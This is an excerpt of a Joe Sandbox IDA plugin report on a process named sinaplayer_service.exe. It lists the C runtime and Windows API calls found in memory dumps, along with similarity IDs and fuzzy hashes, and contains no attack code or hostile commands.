                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection__amsg_exit_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4121137658-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6D094FF8,0000000C), ref: 6D094FCD
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fclose_nolock.MSVCR120(?,?,?,6D094FF8,0000000C), ref: 6D094FD8
                                                                                                                                                                                                      • Part of subcall function 6D094F4C: __freebuf.LIBCMT ref: 6D094F6E
                                                                                                                                                                                                      • Part of subcall function 6D094F4C: _fileno.MSVCR120(?,?,?), ref: 6D094F74
                                                                                                                                                                                                      • Part of subcall function 6D094F4C: _close.MSVCR120(00000000,?,?,?), ref: 6D094F7A
                                                                                                                                                                                                      • Part of subcall function 6D095014: _unlock_file.MSVCR120(?,6D094FEF,?,?,6D094FF8,0000000C), ref: 6D095015
                                                                                                                                                                                                    • _errno.MSVCR120(6D094FF8,0000000C), ref: 6D0D541D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D094FF8,0000000C), ref: 6D0D5428
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1403730806-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F5C03
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000004,6D0FAE4B), ref: 6D0F5C11
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F5C38
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 6D0F5C4F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterH_prolog3LeaveList
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 850592863-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F0102
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000008,6D0EC84E), ref: 6D0F0114
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: TlsSetValue.KERNEL32(?,?), ref: 6D0ECA00
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: GetCurrentThread.KERNEL32 ref: 6D0ECA35
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCMT ref: 6D0ECA48
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F014E
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 6D0F015D
                                                                                                                                                                                                      • Part of subcall function 6D0F0245: Concurrency::details::SchedulerProxy::AdjustAllocationIncrease.LIBCMT ref: 6D0F0296
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::CriticalProxy::SchedulerSection$AdjustAllocationCoreCurrentDecrementEnterEventH_prolog3IncreaseLeaveSubscriptionThreadValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 779242910-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0ECDD4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6D0ECB35), ref: 6D0ECDF9
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6D0ECB35), ref: 6D0ECE10
                                                                                                                                                                                                    • Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 6D0ECE36
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseContextHandle$BaseBase::~Concurrency::details::H_prolog3
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 256686745-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfomemmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 351588475-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA01
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _ftell_nolock.MSVCR120(?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA0C
                                                                                                                                                                                                      • Part of subcall function 6D0AFA4C: _fileno.MSVCR120(?,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA78
                                                                                                                                                                                                      • Part of subcall function 6D0AFA4C: _lseek.MSVCR120(00000000,00000000,00000001,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30), ref: 6D0AFA95
                                                                                                                                                                                                      • Part of subcall function 6D0AF9D6: _unlock_file.MSVCR120(?,6D0AFA23,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AF9D7
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D5855
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D5860
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_ftell_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2873353448-0
                                                                                                                                                                                                    • Opcode ID: fca1da38d7ae5c550d88df6c579d3f95fc8fd3f39be792590edd92c8706dd86a
                                                                                                                                                                                                    • Instruction ID: acf1d94e3aad4e3d4a56a733946f6dfab3378cbf32d73ccaf94af1339eb58625
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fca1da38d7ae5c550d88df6c579d3f95fc8fd3f39be792590edd92c8706dd86a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CF0E571D15706AAFB019BB488007EF7BA8AF51378F264205E624EF1D1DFB889019B51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A0823
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A082F
                                                                                                                                                                                                      • Part of subcall function 6D0A079C: __p__iob.MSVCR120(6D0A0842,6D0A0850,00000010), ref: 6D0A079C
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A086C
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(0000000A,-00000020,6D0A0850,00000010), ref: 6D0A0877
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_fputwc_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2527319753-0
                                                                                                                                                                                                    • Opcode ID: ea08cd8df3f4cef15fff2a9b3225199a89dc65d4b5cd1cd4267ee9ad5d2cbd37
                                                                                                                                                                                                    • Instruction ID: 43ffc86f3cabc0ca2affe96922355a7575588bf62d98976eed47fb834ad3f49d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea08cd8df3f4cef15fff2a9b3225199a89dc65d4b5cd1cd4267ee9ad5d2cbd37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85E0D8B7C9C30A25BA0557F69C0177C33E0EB582687A90105E610DF1D1DF2580815619
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 972587971-0
                                                                                                                                                                                                    • Opcode ID: d620637660ca66bae960d0bd9af8fdd34ac1d04a99c57386e333e1e896d64d61
                                                                                                                                                                                                    • Instruction ID: 7dd73f06cca4404df4afb72af5ec993fc5133eb086bbd7c0b14b5fe501767237
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d620637660ca66bae960d0bd9af8fdd34ac1d04a99c57386e333e1e896d64d61
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69E092313942266BFB125EA8EC01BAA77A8AF05B50F064021FA14DF250E7A1E9109BD5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0FA744
                                                                                                                                                                                                    • free.MSVCR120(?,00000004,6D0F9F0E), ref: 6D0FA771
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000004,6D0F9F0E), ref: 6D0FA779
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000004,6D0F9F0E), ref: 6D0FA781
                                                                                                                                                                                                      • Part of subcall function 6D0F4A30: QueryDepthSList.KERNEL32(6D160EF0,?,?,6D0ECE25,00000004,6D0ECB35), ref: 6D0F4A50
                                                                                                                                                                                                      • Part of subcall function 6D0F4A30: InterlockedPushEntrySList.KERNEL32(6D160EF0,?,?,?,6D0ECE25,00000004,6D0ECB35), ref: 6D0F4A5E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$List$DepthEntryH_prolog3InterlockedPushQuery
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 76379577-0
                                                                                                                                                                                                    • Opcode ID: e38fcfe78b75d90c89bb8bed85a1d32787d139280c3f726f11fac2a2733b9351
                                                                                                                                                                                                    • Instruction ID: d49a7b2f9ca6bdc0e0407bfe8813aca9e5e5e7c6a338ae59c6c8f9acfb80d348
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e38fcfe78b75d90c89bb8bed85a1d32787d139280c3f726f11fac2a2733b9351
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AE09271D057019FFF209F20C901B6D77B07F0530CF114C1CAA915B651CBF6A8119B86
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _set_error_mode.MSVCR120(00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FBD27
                                                                                                                                                                                                    • _set_error_mode.MSVCR120(00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FBD34
                                                                                                                                                                                                      • Part of subcall function 6D0FB3D7: _errno.MSVCR120(?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FB402
                                                                                                                                                                                                      • Part of subcall function 6D0FB3D7: _invalid_parameter_noinfo.MSVCR120(?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FB40D
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0FBD4C
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0FBD56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _set_error_mode$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1239817535-0
                                                                                                                                                                                                    • Opcode ID: 20b0c91ade8dbb02c72076a67344e40671a68112e5af28f4707ed0914149f291
                                                                                                                                                                                                    • Instruction ID: 696f396037ed047162437cc7f550f1caf66b9f0dc69c0aba463dd5490747260c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20b0c91ade8dbb02c72076a67344e40671a68112e5af28f4707ed0914149f291
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5D0C9356CC34BD8F52A92A12822F3922944F02A28F35002AEF205D8D1FFA1D0C35C27
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _ismbblead.MSVCR120(?,6D160F00,6D160F00,00000000,?,6D0AE1FE,6D160F00,00000000,00000000,?,?), ref: 6D0AE0BE
                                                                                                                                                                                                    • _ismbblead.MSVCR120(00000001,6D160F00,6D160F00,00000000,?,6D0AE1FE,6D160F00,00000000,00000000,?,?), ref: 6D0AE170
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _ismbblead
                                                                                                                                                                                                    • String ID: {m
                                                                                                                                                                                                    • API String ID: 1022365105-1004063311
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                    • API String ID: 2959964966-2564639436
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,6D161218,00000104,?,?,?,?,?,?,6D0B2903), ref: 6D0B2D4F
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6D0B2D9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: y[
                                                                                                                                                                                                    • API String ID: 2373854079-3866484319
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,6D160F00,00000104,?,?,?,?,?,?,6D0AE27B), ref: 6D0AE1D4
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6D0AE21C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: 0'Z
                                                                                                                                                                                                    • API String ID: 2373854079-2320578061
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0B1D5C: GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe,00000104,?,?,?,?,?,?,6D0B0E43), ref: 6D0B1D7A
                                                                                                                                                                                                      • Part of subcall function 6D0B1D5C: _malloc_crt.MSVCR120 ref: 6D0B1DC9
                                                                                                                                                                                                    • ___crtGetEnvironmentStringsW.LIBCMT ref: 6D0B0E66
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: GetEnvironmentStringsW.KERNEL32(?,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A95BE
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: _malloc_crt.MSVCR120(-00000002,005C2D90,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A95EB
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: memcpy.MSVCR120(00000000,00000000,-00000002,005C2D90,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8), ref: 6D0A95FB
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: FreeEnvironmentStringsW.KERNEL32(00000000,005C2D90,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9607
                                                                                                                                                                                                      • Part of subcall function 6D0A9704: wcslen.MSVCR120(00000000,?,005C2D90,?,6D0A9DAD,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9727
                                                                                                                                                                                                    • ___mbtow_environ.LIBCMT ref: 6D0D3BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$_malloc_crt$FileFreeModuleName___crt___mbtow_environmemcpywcslen
                                                                                                                                                                                                    • String ID: y[
                                                                                                                                                                                                    • API String ID: 2833736322-3866484319
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,00000003,6D0AC7FC,00000000,00000001,?,00000001), ref: 6D0B3E66
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000001), ref: 6D0B3E95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodePointerfree
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 2443025543-1018135373
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::Name::operator+
                                                                                                                                                                                                    • String ID: unsigned
                                                                                                                                                                                                    • API String ID: 2649573449-4012841044